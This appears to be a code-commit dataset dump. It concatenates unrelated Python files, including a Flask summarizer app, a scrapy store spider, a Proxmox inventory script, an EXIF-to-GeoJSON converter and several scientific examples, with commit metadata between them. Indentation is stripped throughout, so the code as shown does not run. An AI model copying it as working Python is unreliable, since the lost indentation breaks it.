sa.Column('taxi_id', sa.Integer(), nullable=False),
sa.Column('status', sa.Enum('emitted', 'received', 'sent_to_operator', 'received_by_operator', 'received_by_taxi', 'accepted_by_taxi', 'declined_by_taxi', 'incident_client', 'incident_taxi', 'timeout_client', 'timeout_taxi', 'outdated_client', 'outdated_taxi', name='hail_status'), nullable=False),
sa.Column('last_status_change', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('hail')
### end Alembic commands ###
| Python | 0.000001 | |
dde52eb2bb035644e1147bbe21fcf9b1200a2e6b | Add example of section tree from SWC data block. | examples/section_tree_swc.py | examples/section_tree_swc.py | '''Example showing how to extract section information from SWC block'''
import numpy as np
from neurom import ezy
from neurom.io import swc
from neurom.core.tree import Tree
from neurom.core import section_neuron as sn
from neurom.core.dataformat import COLS
from neurom.core.dataformat import POINT_TYPE
class Section(object):
'''sections (id, (ids), type, parent_id)'''
def __init__(self, idx, ids=None, ntype=0, pid=-1):
self.id = idx
self.ids = [] if ids is None else ids
self.ntype = ntype
self.pid = pid
def __str__(self):
return 'Section(id=%s, ids=%s, ntype=%s, pid=%s)' % (self.id, self.ids,
self.ntype, self.pid)
def neurite_trunks(data_wrapper):
'''Get the section IDs of the intitial neurite sections'''
sec = data_wrapper.sections
return [ss.id for ss in sec
if ss.pid is not None and (sec[ss.pid].ntype == POINT_TYPE.SOMA and
ss.ntype != POINT_TYPE.SOMA)]
def soma_points(data_wrapper):
'''Get the soma points'''
db = data_wrapper.data_block
return db[db[:, COLS.TYPE] == POINT_TYPE.SOMA]
def add_sections(data_wrapper):
'''Make a list of sections from an SWC data wrapper'''
# get SWC ID to array position map
id_map = {-1: -1}
for i, r in enumerate(data_wrapper.data_block):
id_map[int(r[COLS.ID])] = i
fork_points = set(id_map[p] for p in data_wrapper.get_fork_points())
end_points = set(id_map[p] for p in data_wrapper.get_end_points())
section_end_points = fork_points | end_points
_sections = [Section(0)]
curr_section = _sections[-1]
parent_section = {-1: None}
for row in data_wrapper.data_block:
row_id = id_map[int(row[COLS.ID])]
if len(curr_section.ids) == 0:
curr_section.ids.append(id_map[int(row[COLS.P])])
curr_section.ntype = int(row[COLS.TYPE])
curr_section.ids.append(row_id)
if row_id in section_end_points:
parent_section[curr_section.ids[-1]] = curr_section.id
_sections.append(Section(len(_sections)))
curr_section = _sections[-1]
# get the section parent ID from the id of the first point.
for sec in _sections:
if sec.ids:
sec.pid = parent_section[sec.ids[0]]
data_wrapper.sections = [s for s in _sections if s.ids]
return data_wrapper
def make_tree(data_wrapper, start_node=0, post_action=None):
'''Build a section tree'''
# One pass over sections to build nodes
nodes = [Tree(np.array(data_wrapper.data_block[sec.ids]))
for sec in data_wrapper.sections[start_node:]]
# One pass over nodes to connect children to parents
for i in xrange(len(nodes)):
parent_id = data_wrapper.sections[i + start_node].pid - start_node
if parent_id >= 0:
nodes[parent_id].add_child(nodes[i])
if post_action is not None:
post_action(nodes[0])
return nodes[0]
def load_neuron(filename, tree_action=sn.set_neurite_type):
'''Build section trees from an h5 file'''
data_wrapper = swc.SWC.read(filename)
add_sections(data_wrapper)
trunks = neurite_trunks(data_wrapper)
trees = [make_tree(data_wrapper, trunk, tree_action)
for trunk in trunks]
# if any neurite trunk starting points are soma,
# remove them
for t in trees:
if t.value[0][COLS.TYPE] == POINT_TYPE.SOMA:
t.value = t.value[1:]
soma = sn.make_soma(soma_points(data_wrapper))
return sn.Neuron(soma, trees, data_wrapper)
def do_new_stuff(filename):
'''Use the section trees to get some basic stats'''
_n = load_neuron(filename)
n_sec = sn.n_sections(_n)
n_seg = sn.n_segments(_n)
sec_len = sn.get_section_lengths(_n)
print 'number of sections:', n_sec
print 'number of segments:', n_seg
print 'total neurite length:', sum(sec_len)
print 'neurite types:'
for n in _n.neurites:
print n.type
def do_old_stuff(filename):
'''Use point tree to get some basic stats'''
_n = ezy.load_neuron(filename)
n_sec = ezy.get('number_of_sections', _n)[0]
n_seg = ezy.get('number_of_segments', _n)[0]
sec_len = ezy.get('section_lengths', _n)
print 'number of sections:', n_sec
print 'number of segments:', n_seg
print 'total neurite length:', sum(sec_len)
print 'neurite types:'
for n in _n.neurites:
print n.type
if __name__ == '__main__':
fname = 'test_data/swc/Neuron.swc'
nrn = load_neuron(fname)
| Python | 0 | |
c560be326c10c1e90b17ba5c6562f55c44dea9f3 | Create main.py | GCP_deploy/main.py | GCP_deploy/main.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Web app for LaserTagger text summarizer """
from __future__ import print_function
from flask import Flask, render_template, request
from predict_main import construct_example
import nltk
import bert_example
import utils
import tagging_converter
import googleapiclient
import tagging
import bert_example_classifier
from nltk.tokenize.treebank import TreebankWordDetokenizer
from builtins import FileExistsError
app = Flask(__name__)
embedding_type = "POS"
label_map_file = "gs://publicly_available_models_yechen/best_hypertuned_POS/label_map.txt"
enable_masking = False
do_lower_case = True
try:
nltk.download('punkt')
except FileExistsError:
print("NLTK punkt exist")
try:
nltk.download('averaged_perceptron_tagger')
except FileExistsError:
print("NLTK averaged_perceptron_tagger exist")
if embedding_type == "Normal" or embedding_type == "Sentence":
vocab_file = "gs://lasertagger_training_yechen/cased_L-12_H-768_A-12/vocab.txt"
elif embedding_type == "POS":
vocab_file = "gs://bert_traning_yechen/trained_bert_uncased/bert_POS/vocab.txt"
elif embedding_type == "POS_concise":
vocab_file = "gs://bert_traning_yechen/trained_bert_uncased/bert_POS_concise/vocab.txt"
else:
raise ValueError("Unrecognized embedding type")
label_map = utils.read_label_map(label_map_file)
converter = tagging_converter.TaggingConverter(
tagging_converter.get_phrase_vocabulary_from_label_map(label_map), True)
id_2_tag = {tag_id: tagging.Tag(tag) for tag, tag_id in label_map.items()}
builder = bert_example.BertExampleBuilder(label_map, vocab_file,
128, do_lower_case, converter, embedding_type, enable_masking)
grammar_vocab_file = "gs://publicly_available_models_yechen/grammar_checker/vocab.txt"
grammar_builder = bert_example_classifier.BertGrammarExampleBuilder(grammar_vocab_file, 128, False)
def predict_json(project, model, instances, version=None):
service = googleapiclient.discovery.build('ml', 'v1')
name = 'projects/{}/models/{}'.format(project, model)
if version is not None:
name += '/versions/{}'.format(version)
response = service.projects().predict(
name=name,
body={'instances': instances}
).execute()
if 'error' in response:
raise RuntimeError(response['error'])
return response['predictions']
@app.route('/', methods=['GET'])
def home():
return render_template('index.html')
@app.route('/predict', methods=['POST'])
def predict():
inp_string = [x for x in request.form.values()]
sentence = nltk.word_tokenize(inp_string[0])
inputs, example = construct_example(sentence, builder)
val = predict_json("smart-content-summary", "Deployed_Models", [inputs])
try:
predicted_ids = val[0]["pred"]
except:
predicted_ids = val[0]
example.features['labels'] = predicted_ids
example.features['labels_mask'] = [0] + [1] * (len(predicted_ids) - 2) + [0]
labels = [id_2_tag[label_id] for label_id in example.get_token_labels()]
prediction = example.editing_task.realize_output(labels)
inputs_grammar, example_grammar = construct_example(prediction, grammar_builder)
grammar_prediction = predict_json("smart-content-summary", "grammar_checker", [inputs_grammar])
try:
grammar = grammar_prediction[0]["pred"][0]
except:
grammar = grammar_prediction[0][0]
prediction= TreebankWordDetokenizer().detokenize(prediction.split())
return render_template('index.html', input=inp_string[0], prediction_bert=prediction, grammar=grammar)
if __name__ == '__main__':
# For deploying to App Engine
app.run(host='127.0.0.1', port=8080, debug=True)
# For local deployment
# app.run(host='localhost', port=8080, debug=True)
| Python | 0.000001 | |
730c7e0e36f0466172c050dd791915938c648953 | summarize git-shortlog by mail | gist/git_shortlog_mail.py | gist/git_shortlog_mail.py | """
Background:
git shortlog -nse
User may use different nick name in git-shortlog, but always use same mail.
This command cannot map user by mail. I have to use complex .mailmap file.
Write this script to summarize commit number by mail instead of by user name.
How to use:
git shortlog -nse > git_shortlog.list
python git_shortlog_mail.py
"""
with open("git_shortlog.list") as fp:
dct = {}
for l in fp:
l = l.split()
k = l[-1]
v = int(l[0].strip())
if k in dct:
dct[k] += v
else:
dct[k] = v
view = [(name, num) for num, name in dct.iteritems()]
view.sort(reverse=True)
for i in range(len(view)):
num, name = view[i]
print "%d\t%d\t%s" % (i + 1, num, name)
| Python | 0.999844 | |
b15bea24cce110619615138c91df0fe79dd04be3 | Add spider for Buy Buy Baby | locations/spiders/buybuybaby.py | locations/spiders/buybuybaby.py | # -*- coding: utf-8 -*-
import json
import scrapy
import re
from locations.items import GeojsonPointItem
class BuyBuyBabySpider(scrapy.Spider):
name = "buybuybaby"
allowed_domains = ["buybuybaby.com"]
start_urls = (
'https://stores.buybuybaby.com/',
)
def store_hours(self, store_hours):
day_groups = []
this_day_group = None
for day_info in store_hours:
day = day_info['day'][:2].title()
hour_intervals = []
for interval in day_info['intervals']:
f_time = str(interval['start']).zfill(4)
t_time = str(interval['end']).zfill(4)
hour_intervals.append('{}:{}-{}:{}'.format(
f_time[0:2],
f_time[2:4],
t_time[0:2],
t_time[2:4],
))
hours = ','.join(hour_intervals)
if not this_day_group:
this_day_group = {
'from_day': day,
'to_day': day,
'hours': hours
}
elif this_day_group['hours'] != hours:
day_groups.append(this_day_group)
this_day_group = {
'from_day': day,
'to_day': day,
'hours': hours
}
elif this_day_group['hours'] == hours:
this_day_group['to_day'] = day
day_groups.append(this_day_group)
opening_hours = ""
if len(day_groups) == 1 and day_groups[0]['hours'] in ('00:00-23:59', '00:00-00:00'):
opening_hours = '24/7'
else:
for day_group in day_groups:
if day_group['from_day'] == day_group['to_day']:
opening_hours += '{from_day} {hours}; '.format(**day_group)
elif day_group['from_day'] == 'Su' and day_group['to_day'] == 'Sa':
opening_hours += '{hours}; '.format(**day_group)
else:
opening_hours += '{from_day}-{to_day} {hours}; '.format(**day_group)
opening_hours = opening_hours[:-2]
return opening_hours
def parse_store(self, response):
if "bedbathandbeyond" in response.url:
return
ref = re.search(r".com/.*?-(\d+)$", response.url).groups()[0]
properties = {
'name': response.xpath('//span[@class="location-name-geo"]/text()').extract_first(),
'addr_full': response.xpath('//address[@itemprop="address"]/span[@itemprop="streetAddress"]/span/text()').extract_first().strip(),
'city': response.xpath('//span[@itemprop="addressLocality"]/text()').extract_first(),
'state': response.xpath('//abbr[@itemprop="addressRegion"]/text()').extract_first(),
'postcode': response.xpath('//span[@itemprop="postalCode"]/text()').extract_first().strip(),
'ref': ref,
'website': response.url,
'lon': float(response.xpath('//span/meta[@itemprop="longitude"]/@content').extract_first()),
'lat': float(response.xpath('//span/meta[@itemprop="latitude"]/@content').extract_first()),
}
phone = response.xpath('//a[@class="c-phone-number-link c-phone-main-number-link"]/text()').extract_first()
if phone:
properties['phone'] = phone
hours = json.loads(response.xpath('//div[@class="c-location-hours-today js-location-hours"]/@data-days').extract_first())
try:
opening_hours = self.store_hours(hours)
except:
opening_hours = None
if opening_hours:
properties['opening_hours'] = opening_hours
yield GeojsonPointItem(**properties)
def parse(self, response):
urls = response.xpath('//a[@class="c-directory-list-content-item-link"]/@href').extract()
for path in urls:
if path.rsplit('-', 1)[-1].isnumeric():
# If there's only one store, the URL will have a store number at the end
yield scrapy.Request(response.urljoin(path), callback=self.parse_store)
else:
yield scrapy.Request(response.urljoin(path))
urls = response.xpath('//a[@class="c-location-grid-item-link"]/@href').extract()
for path in urls:
yield scrapy.Request(response.urljoin(path), callback=self.parse_store)
| Python | 0 | |
fc84c19cdbbe86b1a57efb3468cdfc26785ca4a6 | add utility helper to format table for console output | rawdisk/util/output.py | rawdisk/util/output.py | import numpy as np
def format_table(headers, columns, values, ruler='-'):
printable_rows = []
table = np.empty((len(values), len(columns)), dtype=object)
for row, value in enumerate(values):
table[row] = [str(getattr(value, column)) for column in columns]
column_widths = [
max(len(headers[col]), len(max(table[:, col], key=len)))
for col in range(len(columns))]
# print header
printable_rows.append(' '.join([header.ljust(column_widths[col])
for col, header in enumerate(headers)]))
printable_rows.append(' '.join(['-' * width for width in column_widths]))
for row in table:
printable_rows.append(' '.join([col.ljust(column_widths[idx])
for idx, col in enumerate(row)]))
return printable_rows
| Python | 0 | |
100a03003adf3f425d59b69e95078bd0f1e82193 | Add test script for segfault bug reported by Jeremy Hill. | test/reopen_screen.py | test/reopen_screen.py | #!/usr/bin/env python
# Test for bug reported by Jeremy Hill in which re-opening the screen
# would cause a segfault.
import VisionEgg
VisionEgg.start_default_logging(); VisionEgg.watch_exceptions()
from VisionEgg.Core import Screen, Viewport, swap_buffers
import pygame
from pygame.locals import QUIT,KEYDOWN,MOUSEBUTTONDOWN
from VisionEgg.Text import Text
from VisionEgg.Dots import DotArea2D
def run():
screen = Screen()
screen.parameters.bgcolor = (0.0,0.0,0.0) # black (RGB)
dots = DotArea2D( position = ( screen.size[0]/2.0, screen.size[1]/2.0 ),
size = ( 300.0 , 300.0 ),
signal_fraction = 0.1,
signal_direction_deg = 180.0,
velocity_pixels_per_sec = 10.0,
dot_lifespan_sec = 5.0,
dot_size = 3.0,
num_dots = 100)
text = Text( text = "Vision Egg dot_simple_loop demo.",
position = (screen.size[0]/2,2),
anchor = 'bottom',
color = (1.0,1.0,1.0))
viewport = Viewport( screen=screen, stimuli=[dots,text] )
# The main loop below is an alternative to using the
# VisionEgg.FlowControl.Presentation class.
quit_now = 0
while not quit_now:
for event in pygame.event.get():
if event.type in (QUIT,KEYDOWN,MOUSEBUTTONDOWN):
quit_now = 1
screen.clear()
viewport.draw()
swap_buffers()
screen.close()
print "run 1"
run()
print "run 2"
run()
print "done"
| Python | 0.000011 | |
35849cf3650c5815c0124f90fad3d3fa2ef9abc6 | Create InsertationSort2.py | InsertationSort2.py | InsertationSort2.py | def compareAndRep(numbers , a , b):
temp = numbers[a]
numbers[a] = numbers[b]
numbers[b] = temp
return numbers
def printList(numbers):
strp = ""
for i in range(0 , len(numbers)):
strp += str(numbers[i])
if(i+1 < len(numbers)):
strp += " "
print strp
N = int(raw_input())
numbers = map(int , raw_input().strip().split(" "))
for i in range(1 , N):
for j in range (0 , i ):
if(numbers[i] < numbers[j]):
numbers = compareAndRep(numbers , i , j)
printList(numbers)
| Python | 0 | |
45136a5757ed362818216acdb390bb0c43bf35f7 | Create photos2geojson.py | photos2map/photos2geojson.py | photos2map/photos2geojson.py | # -*- coding: UTF-8 -*-
import os, sys
import exiftool
import json
from fractions import Fraction
def progress(count, total, status=''):
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', status))
sys.stdout.flush() # As suggested by Rom Ruben (see: http://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console/27871113#comment50529068_27871113)
def get_args():
import argparse
p = argparse.ArgumentParser(description='Move images to folder with his date')
p.add_argument('path', help='Path to folder containing JPG files')
return p.parse_args()
def _get_if_exist(data, key):
if key in data:
return data[key]
return None
geojsonHeader='''
{
"type": "FeatureCollection",
"crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
"features": [
'''
geojsonFooter='''
]
}
'''
if __name__ == '__main__':
args = get_args()
file_list = []
for root, sub_folders, files in os.walk(args.path):
for name in files:
file_list += [os.path.join(root, name) ]
fs = open('photos.geojson','w')
fs.write(geojsonHeader+"\n")
fs.close()
fs = open('photos.geojson','a')
index = 0
IterationStep = 200
total = len(file_list)
while index < total:
with exiftool.ExifTool() as et:
metadata = et.get_tags_batch(['EXIF:GPSLongitude','EXIF:GPSLatitude','DateTimeOriginal'],file_list[index:index+IterationStep])
for record in metadata:
dict = json.dumps(record)
#print dict
geojsonString='{ "type": "Feature", "properties": { "filename": "%(SourceFile)s", "datetime": "%(EXIF:DateTimeOriginal)s" }, "geometry": { "type": "Point", "coordinates": [ %(EXIF:GPSLongitude)s, %(EXIF:GPSLatitude)s ] } }, '
exportString = geojsonString % {"SourceFile" : record['SourceFile'],'EXIF:DateTimeOriginal' : _get_if_exist(record,'EXIF:DateTimeOriginal'),"EXIF:GPSLatitude" : _get_if_exist(record,'EXIF:GPSLatitude'),"EXIF:GPSLongitude" : _get_if_exist(record,'EXIF:GPSLongitude')}
if _get_if_exist(record,'EXIF:GPSLatitude') and _get_if_exist(record,'EXIF:GPSLongitude'):
fs.write(exportString+"\n")
index = index+IterationStep
if index > total:
index=total
progress(index, len(file_list), status='Create geojson with photo locations, total = '+str(total))
fs = open('photos.geojson','a')
fs.write(geojsonFooter+"\n")
fs.close()
'''
cmd = ['exiftool', filepath]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
out, err = p.communicate('-GPSLongitude')
print out
'''
'''
mt = mimetypes.guess_type(filepath)[0]
if mt:
f = open(filepath, 'rb')
tags = exifread.process_file(f)
lat,lon = get_lat_lon(tags)
#print filepath.ljust(50),str(lat).ljust(20), str(lon).ljust(20)
exiftool E:\PHOTO\z_bat\geo\test1\IMG_20150228_231555.jpg"" -GPSLongitude -GPSLatitude --n -json
exiftool -stay_open True -@
'''
#python geo3.py "E:\PHOTO\z_bat\geo\test1"
| Python | 0.000016 | |
97e46b93124758bec85d2e81a6843c22a265bce3 | Add entry point for GC repo importer | ForgeImporters/setup.py | ForgeImporters/setup.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from setuptools import setup, find_packages
setup(name='ForgeImporters',
description="",
long_description="",
classifiers=[],
keywords='',
author='',
author_email='',
url='',
license='',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=['Allura', ],
entry_points="""
# -*- Entry points: -*-
[allura.project_importers]
google-code = forgeimporters.google.project:GoogleCodeProjectImporter
[allura.importers]
google-code-repo = forgeimporters.google.code:GoogleRepoImporter
""",)
| # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from setuptools import setup, find_packages
setup(name='ForgeImporters',
description="",
long_description="",
classifiers=[],
keywords='',
author='',
author_email='',
url='',
license='',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=['Allura', ],
entry_points="""
# -*- Entry points: -*-
[allura.project_importers]
google-code = forgeimporters.google.project:GoogleCodeProjectImporter
[allura.importers]
""",)
| Python | 0 |
76f473cd5d5a8ed1c6c5deb173587ce01e5b8f29 | add a proxmox inventory plugin | plugins/inventory/proxmox.py | plugins/inventory/proxmox.py | #!/usr/bin/env python
# Copyright (C) 2014 Mathieu GAUTHIER-LAFAYE <gauthierl@lapth.cnrs.fr>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import urllib
import urllib2
try:
import json
except ImportError:
import simplejson as json
import os
import sys
from optparse import OptionParser
class ProxmoxNodeList(list):
def get_names(self):
return [node['node'] for node in self]
class ProxmoxQemuList(list):
def get_names(self):
return [qemu['name'] for qemu in self if qemu['template'] != 1]
class ProxmoxPoolList(list):
def get_names(self):
return [pool['poolid'] for pool in self]
class ProxmoxPool(dict):
def get_members_name(self):
return [member['name'] for member in self['members'] if member['template'] != 1]
class ProxmoxAPI(object):
def __init__(self, options):
self.options = options
self.credentials = None
if not options.url:
raise Exception('Missing mandatory parameter --url (or PROXMOX_URL).')
elif not options.username:
raise Exception('Missing mandatory parameter --username (or PROXMOX_USERNAME).')
elif not options.password:
raise Exception('Missing mandatory parameter --password (or PROXMOX_PASSWORD).')
def auth(self):
request_path = '{}api2/json/access/ticket'.format(self.options.url)
request_params = urllib.urlencode({
'username': self.options.username,
'password': self.options.password,
})
data = json.load(urllib2.urlopen(request_path, request_params))
self.credentials = {
'ticket': data['data']['ticket'],
'CSRFPreventionToken': data['data']['CSRFPreventionToken'],
}
def get(self, url, data=None):
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'PVEAuthCookie={}'.format(self.credentials['ticket'])))
request_path = '{}{}'.format(self.options.url, url)
request = opener.open(request_path, data)
response = json.load(request)
return response['data']
def nodes(self):
return ProxmoxNodeList(self.get('api2/json/nodes'))
def node_qemu(self, node):
return ProxmoxQemuList(self.get('api2/json/nodes/{}/qemu'.format(node)))
def pools(self):
return ProxmoxPoolList(self.get('api2/json/pools'))
def pool(self, poolid):
return ProxmoxPool(self.get('api2/json/pools/{}'.format(poolid)))
def main_list(options):
result = {}
proxmox_api = ProxmoxAPI(options)
proxmox_api.auth()
# all
result['all'] = []
for node in proxmox_api.nodes().get_names():
result['all'] += proxmox_api.node_qemu(node).get_names()
# pools
for pool in proxmox_api.pools().get_names():
result[pool] = proxmox_api.pool(pool).get_members_name()
print json.dumps(result)
def main_host():
print json.dumps({})
def main():
parser = OptionParser(usage='%prog [options] --list | --host HOSTNAME')
parser.add_option('--list', action="store_true", default=False, dest="list")
parser.add_option('--host', dest="host")
parser.add_option('--url', default=os.environ.get('PROXMOX_URL'), dest='url')
parser.add_option('--username', default=os.environ.get('PROXMOX_USERNAME'), dest='username')
parser.add_option('--password', default=os.environ.get('PROXMOX_PASSWORD'), dest='password')
(options, args) = parser.parse_args()
if options.list:
main_list(options)
elif options.host:
main_host()
else:
parser.print_help()
sys.exit(1)
if __name__ == '__main__':
main()
| Python | 0 | |
1e7421878e90949abc4f6fac5835bd27b472d2b6 | Add example script for the newly added mixed_diffusivity | example_Knudsen.py | example_Knudsen.py | import openpnm as op
import numpy as np
import matplotlib.pyplot as plt
# Get Deff w/o including Knudsen effect
spacing = 1.0
net = op.network.Cubic(shape=[10, 10, 10], spacing=spacing)
geom = op.geometry.StickAndBall(network=net)
air = op.phases.Air(network=net)
phys = op.physics.Standard(network=net, geometry=geom, phase=air)
fd = op.algorithms.FickianDiffusion(network=net, phase=air)
fd.set_value_BC(pores=net.pores("left"), values=1.0)
fd.set_value_BC(pores=net.pores("right"), values=0.0)
fd.run()
L = (net.shape * net.spacing)[1]
A = (net.shape * net.spacing)[[0, 2]].prod()
Mdot = fd.rate(pores=net.pores("left")).squeeze()
Deff0 = Mdot * L / A
# Get Deff w/ including Knudsen effect
mdiff = op.models.physics.diffusive_conductance.mixed_diffusivity
phys.add_model(propname="throat.diffusive_conductance", model=mdiff)
spacings = np.linspace(1e-9, 1e-4, 20)
spacings = np.logspace(-9, -3, 25)
Deff = []
for spacing in spacings:
np.random.seed(10)
net = op.network.Cubic(shape=[10, 10, 10], spacing=spacing)
geom = op.geometry.StickAndBall(network=net)
air = op.phases.Air(network=net)
phys = op.physics.Standard(network=net, geometry=geom, phase=air)
phys.add_model(propname="throat.diffusive_conductance", model=mdiff)
fd = op.algorithms.FickianDiffusion(network=net, phase=air)
fd.set_value_BC(pores=net.pores("left"), values=1.0)
fd.set_value_BC(pores=net.pores("right"), values=0.0)
fd.run()
L = (net.shape * net.spacing)[1]
A = (net.shape * net.spacing)[[0, 2]].prod()
Mdot = fd.rate(pores=net.pores("left")).squeeze()
Deff.append(Mdot * L / A)
# Plot ratio of Deff w/ Knudsen to that w/o
Deff = np.array(Deff)
plt.figure()
plt.plot(spacings, Deff/Deff0)
plt.xscale("log")
plt.xlabel("spacing (m)")
plt.ylabel("Deff/Deff0")
| Python | 0 | |
a6bbcc46765fee52eba9c31b95d456977fbeeefe | add beautify for print beautify words | Scripts/beautify.py | Scripts/beautify.py | #!/usr/bin/env python
import sys
def beautify(line, bold=False):
k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
v = '𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏'
bv = '𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃'
chars = dict(zip(k, bv if bold else v))
return ''.join([chars.get(char, char) for char in line])
if __name__ == '__main__':
user_input = ' '.join(sys.argv[1:])
result = beautify(user_input)
print(result)
| Python | 0.000007 | |
cbafc49d098ee1166aae32eae79a808e576a1afa | Hello world | Simple/hello.py | Simple/hello.py | print("Hello, world")
| Python | 0.999979 | |
ef9b099b1a0f6abe4bde3d74f79d0daa31c38dbd | Add interactive flash size (energy) spectrum plot that can sync to points in 4-panel view | LMA/analysis.py | LMA/analysis.py | """
Get a plot of the flash energy spectrum for flashes in the current brawl4d view.
lma_ctrl is an instance of brawl4d.LMA.controller.LMAController that
>>> from brawl4d.brawl4d import B4D_startup
>>> from datetime import datetime
>>> panels = B4D_startup(basedate=datetime(2012,5,29), ctr_lat=35.2791257, ctr_lon=-97.9178678)
>>> from brawl4d.LMA.controller import LMAController
>>> lma_file = '/data/20120529/flash_sort_prelim/h5_files/2012/May/29/LYLOUT_120529_233000_0600.dat.flash.h5'
>>> lma_ctrl = LMAController()
>>> d, post_filter_brancher, scatter_ctrl, charge_lasso = lma_ctrl.load_hdf5_to_panels(panels, lma_file)
>>> current_events_flashes = lma_ctrl.flash_stats_for_dataset(d, scatter_ctrl.branchpoint)
>>> energy_spectrum_plotter = FlashEnergySpectrumController(bounds_provider=panels)
>>> current_events_flashes.targets.add(energy_spectrum_plotter.inlet)
"""
import numpy as np
from stormdrain.pipeline import coroutine
from stormdrain.support.matplotlib.artistupdaters import LineArtistUpdater
from lmatools.flash_stats import events_flashes_receiver, histogram_for_parameter, energy_plot_setup, calculate_energy_from_area_histogram
class FlashEnergySpectrumController(object):
def __init__(self, coord_names=('length_scale', 'energy'), bin_unit='km', bounds_provider=None):
""" The inlet attribute of this object is a running coroutine ready to receive (events,flashes).
bounds_provider should have a bounds attribute that provides a time coordinate 'time' in seconds
"""
min_pwr = -2
max_pwr = 4
delta_pwr = 0.1
powers = np.arange(min_pwr, max_pwr+delta_pwr, delta_pwr)
footprint_bin_edges = 10**powers
self.coord_names=coord_names
self.bounds_provider = bounds_provider
fig, spectrum_ax, fivethirds_line_artist, spectrum_artist = energy_plot_setup()
self.spectrum_ax=spectrum_ax
self.spectrum_plot_outlet = LineArtistUpdater(spectrum_artist, coord_names=self.coord_names).update()
self.histogrammer = histogram_for_parameter('area', footprint_bin_edges, target=self.calculate_energy(target=self.spectrum_plot_outlet))
self.inlet = events_flashes_receiver(target=self.histogrammer)
@coroutine
def calculate_energy(self, target=None, length_scale_factor=1000.0, t_coord='time'):
""" Presumes the histogram is of area, and that area is in km^2 (as indicated by length_scale_factor) """
xname, yname = self.coord_names
dtype = [(xname,'f4'), (yname,'f4')]
while True:
t_range = self.bounds_provider.bounds[t_coord]
duration = t_range[1] - t_range[0]
histo, bin_edges = (yield)
flash_1d_extent, specific_energy = calculate_energy_from_area_histogram(histo, bin_edges, duration)
if target is not None:
# package energy spectrum as a named array
a = np.empty_like(flash_1d_extent, dtype=dtype)
a[xname]=flash_1d_extent
a[yname]=specific_energy
target.send(a)
self.spectrum_ax.figure.canvas.draw()
#ax.loglog(flash_1d_extent, specific_energy, 'r')
| Python | 0 | |
e1772c008d607a2545ddaa05508b1a74473be0ec | Add TaskInstance index on job_id | airflow/migrations/versions/7171349d4c73_add_ti_job_id_index.py | airflow/migrations/versions/7171349d4c73_add_ti_job_id_index.py | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add ti job_id index
Revision ID: 7171349d4c73
Revises: cc1e65623dc7
